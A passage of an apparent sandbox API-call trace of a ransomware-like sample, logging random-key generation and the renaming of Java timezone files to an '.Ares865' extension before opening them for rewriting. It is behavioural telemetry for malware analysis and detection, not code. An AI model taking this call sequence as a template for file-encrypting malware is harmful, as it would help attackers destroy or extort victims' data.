dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.683] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.683] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.683] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kabul" | out: lpString1="Kabul") returned="Kabul" [0134.683] lstrlenW (lpString="Kabul") returned 5 [0134.683] lstrlenW (lpString="Ares865") returned 7 [0134.683] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul.Ares865") returned 58 [0134.683] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul.ares865"), dwFlags=0x1) returned 1 [0134.685] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.685] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0134.685] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.686] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.686] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.690] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.691] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.691] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.691] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kamchatka" | out: lpString1="Kamchatka") returned="Kamchatka" [0134.691] lstrlenW (lpString="Kamchatka") returned 9 [0134.691] lstrlenW (lpString="Ares865") returned 7 [0134.691] lstrcmpiW (lpString1="mchatka", lpString2="Ares865") returned 1 [0134.692] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka.Ares865") returned 62 [0134.692] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka.ares865"), dwFlags=0x1) returned 1 [0134.694] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.694] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0134.694] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.695] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.695] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.697] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.698] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Karachi" | out: lpString1="Karachi") returned="Karachi" [0134.698] lstrlenW (lpString="Karachi") returned 7 [0134.698] lstrlenW (lpString="Ares865") returned 7 [0134.699] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi.Ares865") returned 60 [0134.699] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi.ares865"), dwFlags=0x1) returned 1 [0134.700] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.700] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153) returned 1 [0134.701] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.701] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.701] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.704] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.705] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.705] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.705] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kashgar" | out: lpString1="Kashgar") returned="Kashgar" [0134.705] lstrlenW (lpString="Kashgar") returned 7 [0134.705] lstrlenW (lpString="Ares865") returned 7 [0134.706] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar.Ares865") returned 60 [0134.706] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar.ares865"), dwFlags=0x1) returned 1 [0134.707] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.707] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=193) returned 1 [0134.708] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.708] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.708] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.711] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.712] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.712] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.712] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kathmandu" | out: lpString1="Kathmandu") returned="Kathmandu" [0134.712] lstrlenW (lpString="Kathmandu") returned 9 [0134.712] lstrlenW (lpString="Ares865") returned 7 [0134.712] lstrcmpiW (lpString1="thmandu", lpString2="Ares865") returned 1 [0134.712] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu.Ares865") returned 62 [0134.713] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu.ares865"), dwFlags=0x1) returned 1 [0134.714] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.714] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0134.715] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.715] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.715] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.718] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.719] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.719] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.719] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Khandyga" | out: lpString1="Khandyga") returned="Khandyga" [0134.719] lstrlenW (lpString="Khandyga") returned 8 [0134.720] lstrlenW (lpString="Ares865") returned 7 [0134.720] lstrcmpiW (lpString1="handyga", lpString2="Ares865") returned 1 [0134.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga.Ares865") returned 61 [0134.720] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga.ares865"), dwFlags=0x1) returned 1 [0134.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=601) returned 1 [0134.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.726] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.727] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kolkata" | out: lpString1="Kolkata") returned="Kolkata" [0134.727] lstrlenW (lpString="Kolkata") returned 7 [0134.727] lstrlenW (lpString="Ares865") returned 7 [0134.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata.Ares865") returned 60 [0134.727] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata.ares865"), dwFlags=0x1) returned 1 [0134.729] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.729] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0134.729] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.730] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.730] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.732] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.733] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.733] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.734] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Krasnoyarsk" | out: lpString1="Krasnoyarsk") returned="Krasnoyarsk" [0134.734] lstrlenW (lpString="Krasnoyarsk") returned 11 [0134.734] lstrlenW (lpString="Ares865") returned 7 [0134.734] lstrcmpiW (lpString1="noyarsk", lpString2="Ares865") returned 1 [0134.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk.Ares865") returned 64 [0134.734] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk.ares865"), dwFlags=0x1) returned 1 [0134.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0134.736] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.737] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.737] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.740] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.740] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.741] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.741] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kuala_Lumpur" | out: lpString1="Kuala_Lumpur") returned="Kuala_Lumpur" [0134.741] lstrlenW (lpString="Kuala_Lumpur") returned 12 [0134.741] lstrlenW (lpString="Ares865") returned 7 [0134.741] lstrcmpiW (lpString1="_Lumpur", lpString2="Ares865") returned -1 [0134.741] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur.Ares865") returned 65 [0134.742] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur.ares865"), dwFlags=0x1) returned 1 [0134.743] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.743] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0134.743] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.744] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.744] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.747] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.748] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.748] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.748] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kuching" | out: lpString1="Kuching") returned="Kuching" [0134.748] lstrlenW (lpString="Kuching") returned 7 [0134.748] lstrlenW (lpString="Ares865") returned 7 [0134.749] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching.Ares865") returned 60 [0134.749] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching.ares865"), dwFlags=0x1) returned 1 [0134.751] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.751] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217) returned 1 [0134.751] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.752] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.752] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.756] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.757] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.757] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.758] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Kuwait" | out: lpString1="Kuwait") returned="Kuwait" [0134.758] lstrlenW (lpString="Kuwait") returned 6 [0134.758] lstrlenW (lpString="Ares865") returned 7 [0134.758] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait.Ares865") returned 59 [0134.758] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait.ares865"), dwFlags=0x1) returned 1 [0134.760] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.760] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0134.760] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.761] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.761] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.764] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.765] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.765] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.765] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Macau" | out: lpString1="Macau") returned="Macau" [0134.765] lstrlenW (lpString="Macau") returned 5 [0134.765] lstrlenW (lpString="Ares865") returned 7 [0134.765] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau.Ares865") returned 58 [0134.765] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau.ares865"), dwFlags=0x1) returned 1 [0134.768] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.768] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=393) returned 1 [0134.768] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.769] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.769] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.771] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.772] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.772] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.773] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Magadan" | out: lpString1="Magadan") returned="Magadan" [0134.773] lstrlenW (lpString="Magadan") returned 7 [0134.773] lstrlenW (lpString="Ares865") returned 7 [0134.773] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan.Ares865") returned 60 [0134.773] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan.ares865"), dwFlags=0x1) returned 1 [0134.775] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.775] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0134.775] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, 